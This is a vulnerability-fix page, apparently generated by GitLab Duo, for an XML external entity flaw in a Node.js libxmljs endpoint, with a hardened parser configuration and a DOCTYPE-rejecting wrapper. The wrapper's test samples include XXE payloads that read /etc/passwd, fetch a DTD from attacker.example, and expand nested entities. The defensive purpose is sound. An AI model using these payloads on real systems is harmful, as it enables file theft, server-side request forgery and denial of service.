Resolve vulnerability: Improper restriction of XML external entity reference
Vulnerability finding detected in merge request: Update file cwe-209-base.py (!45) • Unassigned
AI GENERATED FIX
The suggested code changes were generated by GitLab Duo Vulnerability Resolution, an AI feature. Use this feature with caution. Before you run a pipeline or apply the code changes, carefully review and test them, to ensure that they solve the vulnerability.
The large language model that generated the suggested code changes was provided with the entire file that contains the vulnerable lines of code. It is not aware of any functionality outside of this context.
Please see our documentation for more information about this feature and leave feedback in this issue.
Description:
User controlled data in XML parsers can result in XML External or Internal Entity (XXE) Processing vulnerabilities
- Severity: critical
- Location: cwes/cwe-611/javascript/cwe-611-base.js:10
Analysis:
The vulnerability report identifies an XML External Entity (XXE) vulnerability (CWE-611) in the code. XXE is a serious issue: an attacker who controls XML input can make the parser read local files, reach internal services on the parser's behalf (server-side request forgery), or exhaust CPU and memory through nested entity expansion (denial of service).
Looking at the code, the application uses the libxmljs library to parse XML input from users. The parse happens in the /parse-xml endpoint, where the user-provided XML string is passed to libxmljs.parseXml.
The key issue is the parser configuration, and this particular option is easy to get backwards. libxmljs hands its options straight to libxml2: noent maps to XML_PARSE_NOENT, which means "substitute entities". So noent: true turns entity expansion ON, and noent: false (the default) leaves entity references unexpanded. The name reads like "no entities", which is why the option is so often set the wrong way round. The other two options do what they say: dtdload: false stops the parser from fetching an external DTD, and nonet: true forbids any network access during parsing.
With noent: false, dtdload: false and nonet: true together, the parser never substitutes attacker-declared entities and never dereferences SYSTEM identifiers, so the classic file-read, SSRF and billion-laughs payloads are neutralised. A document that declares its own entities is still parsed, with the references left as unexpanded entity-reference nodes. If the endpoint has no need for DTDs at all, the cleanest hardening is to reject any input that contains a DOCTYPE before it reaches the parser.
The proper fix is therefore not to flip noent to true; that change would introduce the vulnerability rather than remove it. Keep noent: false (or omit it, since false is the default), keep dtdload: false and nonet: true, and add a DOCTYPE check at the endpoint as defence in depth. The analysis should also be re-checked against the actual flagged line: if noent is indeed already false there, flipping it is the one change that must not be made.
Summary:
XML External Entity (XXE) Vulnerability Fix
Vulnerability
The code was flagged for XML External Entity (XXE) exposure (CWE-611), which is listed in the OWASP Top 10 as A4:2017 and is part of A05:2021 Security Misconfiguration. XXE vulnerabilities allow attackers to read sensitive files, perform server-side request forgery, or cause denial of service by manipulating XML input.
Fix
The hardened parse call keeps entity substitution off and the parser offline:
const xmlDoc = libxmljs.parseXml(xmlString, {
noent: false, // libxml2 XML_PARSE_NOENT: true would ENABLE entity substitution
dtdload: false, // never fetch an external DTD
nonet: true, // no network access during parsing
});
With these settings the parser does not substitute entity references with their values and does not dereference SYSTEM identifiers, which blocks the file-read, SSRF and entity-expansion forms of XXE.
These options are only as good as their review: a later change that sets noent: true in the belief that it disables entities silently reopens the hole. Pairing them with a DOCTYPE rejection check at the endpoint removes the dependency on a single, confusingly named flag.
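An added example, not code from this page or from the project under review: a defence-in-depth wrapper for an endpoint like /parse-xml that hands user XML to libxmljs. It assumes libxmljs (the library the finding names) for the actual parse and loads it lazily; everything else is plain Node.js. The option object is the hardened set, with noent: false because libxmljs passes noent to libxml2 as XML_PARSE_NOENT ("substitute entities"). The names HARDENED_XML_OPTIONS, hasDtd, assertNoDtd, parseUntrustedXml, triage and UntrustedXmlError are mine, and the sample documents are constructed for the demonstration.

```javascript
// Added example (not the page's or the project's code). Two layers of XXE
// defence for an endpoint such as /parse-xml that hands user XML to libxmljs:
//   1. reject any document that carries a DTD before it reaches the parser;
//   2. call libxmljs.parseXml with options that keep entity substitution and
//      external DTD loading off and deny the parser network access.

// libxmljs passes these options to libxml2. `noent` is XML_PARSE_NOENT, i.e.
// "substitute entities", so the safe value is false (the default); setting it
// to true would turn entity expansion ON. `dtdload: false` prevents fetching
// an external DTD, `dtdvalid: false` skips DTD validation, and `nonet: true`
// forbids any network access during parsing.
const HARDENED_XML_OPTIONS = Object.freeze({
  noent: false,
  dtdload: false,
  dtdvalid: false,
  nonet: true,
});

// A DTD can only enter a document through a literal `<!DOCTYPE` declaration,
// and entities can only be declared inside a DTD with `<!ENTITY`. XML keywords
// are case-sensitive, so `<!doctype` is not a valid DTD, but matching
// case-insensitively only ever rejects more input, which is the safe direction.
const DTD_MARKER = /<!(DOCTYPE|ENTITY)\b/i;

class UntrustedXmlError extends Error {}

// Returns true if the (decoded) document contains a DTD or entity declaration.
function hasDtd(xmlString) {
  return DTD_MARKER.test(xmlString);
}

// Gate: throw unless the input is a string without a DTD. Decode request
// bodies to a string first; a raw UTF-16 buffer would not match the regex.
function assertNoDtd(xmlString) {
  if (typeof xmlString !== 'string') {
    throw new UntrustedXmlError('XML body must be a decoded string');
  }
  if (hasDtd(xmlString)) {
    throw new UntrustedXmlError('DOCTYPE and ENTITY declarations are not accepted');
  }
}

// Parse untrusted XML behind the gate. libxmljs is required lazily so the gate
// itself can be exercised without the native module installed.
function parseUntrustedXml(xmlString) {
  assertNoDtd(xmlString);
  const libxmljs = require('libxmljs');
  return libxmljs.parseXml(xmlString, HARDENED_XML_OPTIONS);
}

// Constructed sample documents: one benign, three classic XXE shapes
// (local file read, external DTD fetch, billion-laughs expansion).
const SAMPLES = {
  benign: '<?xml version="1.0"?><order><item>widget</item></order>',
  fileRead:
    '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><r>&xxe;</r>',
  externalDtd:
    '<?xml version="1.0"?><!DOCTYPE r SYSTEM "http://attacker.example/evil.dtd"><r/>',
  billionLaughs:
    '<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;&lol;">]><lolz>&lol2;</lolz>',
};

// Run the gate over every sample and report which ones it would let through
// to the parser.
function triage(samples = SAMPLES) {
  const result = {};
  for (const [name, xml] of Object.entries(samples)) {
    result[name] = hasDtd(xml) ? 'rejected' : 'accepted';
  }
  return result;
}

if (typeof module !== 'undefined' && require.main === module) {
  console.log(triage());
}
```

In the endpoint, call parseUntrustedXml on the decoded request body and map UntrustedXmlError to a 400 response. The gate is deliberately coarse: a DOCTYPE inside a comment or CDATA section is harmless but is still rejected, and that trade-off is the right one for an API that never expects a DTD.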
Identifiers:
- NodeJS Scan ID javascript-xml-rule-node_xxe
- A05:2021 - Security Misconfiguration
- A4:2017 - XML External Entities (XXE)
- nodejs_scan.javascript-xml-rule-node_xxe
- CWE-611